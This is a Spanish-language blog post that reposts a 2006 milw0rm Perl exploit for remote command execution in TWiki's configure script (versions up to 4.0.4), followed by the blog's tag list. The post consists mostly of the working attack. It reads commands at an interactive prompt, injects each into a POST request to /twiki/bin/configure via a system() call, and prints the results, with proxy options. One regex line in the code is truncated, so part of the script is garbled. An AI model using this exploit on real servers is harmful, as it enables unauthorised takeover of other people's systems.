jueves, 28 de agosto de 2008

TWiki <= 4.0.4 (configure) - Remote Command Execution Exploit - Ejecucion de codigo remoto

#!/usr/bin/perl
# Tue Aug 1 13:18:12 CEST 2006 jolascoaga@514.es
use strict;
use LWP::UserAgent;
use LWP::Simple;
use HTTP::Request;
use HTTP::Response;
use Getopt::Long;
$| = 1; # couse 1 is bigger than 0
my ($proxy,$proxy_user,$proxy_pass);
my ($host,$debug,$dir, $command);
my $options = GetOptions (
'host=s' => \$host,
'dir=s' => \$dir,
'proxy=s' => \$proxy,
'proxy_user=s' => \$proxy_user,
'proxy_pass=s' => \$proxy_pass,
'debug' => \$debug);
&help unless ($host); # you dont need root
$dir = "/twiki/bin/configure" unless($dir); # ... we have a template for this
print "$host - $dir\n";
while () {
print "tinkiwinki> "; # phf haquerz style
while() {
$command=$_;
chomp($command);
last;
}
&send($command);
}

sub send {
my ($cmd) = @_;
my $ok = 0;
my $socket;
LWP::Debug::level('+') if $debug; # but remember this is crap :D
my $ua = new LWP::UserAgent();
$ua->agent("safari/zoo");
if ($host !~ /^http/) {
$host = sprintf ("http://%s", $host); # CRAP CRAP CRAP
}
my $req = HTTP::Request->new(POST => $host.$dir);
$req->content('action=update&TYPEOF%3A%29%3Bsystem%28%27'.$cmd.'%27%29%3Bmy+@a%3D%28=anything&submit=Submit');
$ua->proxy(['http'] => $proxy) if $proxy;
$req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
print $req->as_string() if $debug;
my $res = $ua->request($req);
my $html = $res->content();
$html =~ m/(.*?)

print $1."\n";
if ($debug) {
open (DEBG, ">wikidebug");
print DEBG $html;
}
}
sub help {
print "Syntax: ./$0 --host=url --dir=/horde [options]\n";
print "\t--proxy (http), --proxy_user, --proxy_pass\n";
print "\t--debug\n";
print "the default directory is /twiki/bin/configure\n";
print "\nExample\n";
print "bash# $0 --host=http(s)://www.server.com/\n";
print "\n";
exit(1);
}
exit 0;
#

# milw0rm.com [2006-08-07]


Se produjo un error en este gadget.

Etiquetas

INTERNET (457) newsweek (305) SEGURIDAD (225) software (136) HACK (86) Hacker (46) GOOGLE (44) Geek (41) hardware (36) WINDOWS (34) Hackers (31) CRACK (29) video (28) DESCARGA (27) facebook (27) videos (26) Celulares (25) MICROSOFT (22) Informatica (21) apple (19) GRATIS (18) technology (18) virus (18) exploit (17) computación (16) informatico (16) web (15) cracker (14) INALAMBRICO (13) WINDOWS 7 (13) noticias (11) MSN (10) termino (10) ACTUALIZACION (9) Gamer (9) LapTops (9) Mac (9) PASSWORD (9) WINDOWS XP (9) dns (9) firefox (9) juegos (9) FOTOS (8) cientifico (8) iphone (8) WEP (7) antivirus (7) bibliografia (7) Desencriptar (6) INFINITUM (6) wifi (6) youtube (6) Craker (5) Culiacan (5) DESMOSTRACION (5) TELEFONIA (5) messenger (5) DIRECTA (4) DOWNLOAD (4) ESPAÑOL (4) XBOX (4) gmail (4) xss (4) Glosario (3) HTML (3) WPA (3) anuncios (3) hosting (3) hotmail (3) Guru (2) ajax (2) ataques (2) wpa2 (2)